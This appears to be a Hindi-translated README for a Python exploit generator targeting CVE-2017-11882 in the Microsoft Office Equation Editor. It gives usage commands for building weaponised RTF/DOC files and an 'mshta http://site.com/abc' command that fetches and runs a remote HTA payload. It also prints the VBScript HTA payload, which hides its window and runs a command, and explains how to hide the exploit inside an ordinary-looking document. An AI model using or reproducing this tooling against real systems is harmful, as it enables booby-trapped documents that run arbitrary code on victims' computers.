
पायथन-आधारित एक्सप्लॉइट जनरेटर CVE-2017-11882 (माइक्रोसॉफ्ट ऑफिस इक्वेशन एडिटर रिमोट कोड एग्जीक्यूशन) के लिए, कस्टम शेलकोड और mshta पेलोड के लिए समर्थन के साथ, RTF/DOC फाइलों के माध्यम से।
43b मूल स्क्रिप्ट https://github.com/embedi/CVE-2017-11882 से है
109b मूल स्क्रिप्ट https://github.com/unamer/CVE-2017-11882/ से है (एक बार सराहना करें, अब unamer का कोड शेलकोड निष्पादित कर सकता है~)
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
mshta का उपयोग करें
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
abc
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
43b कमांड की लंबाई 43 बाइट्स से अधिक नहीं हो सकती, 109b कमांड की लंबाई 109 बाइट्स से अधिक नहीं हो सकती
example फ़ोल्डर में एक .rtf फ़ाइल है जो CVE-2017-11882 भेद्यता का शोषण करती है और सिस्टम में कैलकुलेटर चलाती है।
वास्तव में, अनुकूलित सामग्री का तरीका अन्य गुरुओं से सीखा गया था, बहुत पहले इसे एक स्क्रिप्ट के रूप में लिखा गया था, शुरू में इसे सार्वजनिक करने का इरादा नहीं था, लेकिन जब देखा कि समूह में किसी ने इसे पहले ही पोस्ट कर दिया है, तो कोई विकल्प नहीं था, इसे सार्वजनिक करना पड़ा। वास्तव में तरीका बहुत सरल है, बस एक सामान्य दस्तावेज़ rtf को टेक्स्ट फ़ाइल में खोलें, {*\datastore से पहले की सभी सामग्री को कॉपी करें, और {\object\objautlink\objupdate से पहले की सामग्री को बदलें, इसलिए इसे स्क्रिप्ट में लिखना बहुत आसान है।
अनुकूलित सामग्री जोड़ने का उपयोग, कोई भी स्क्रिप्ट चुनें:
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf
अनुकूलित सामग्री input.rtf में है।
unamer के नवीनतम 605 बाइट शोषण स्क्रिप्ट के बारे में, इसे अपडेट नहीं किया जाएगा, रुचि हो तो स्वयं संशोधित करें।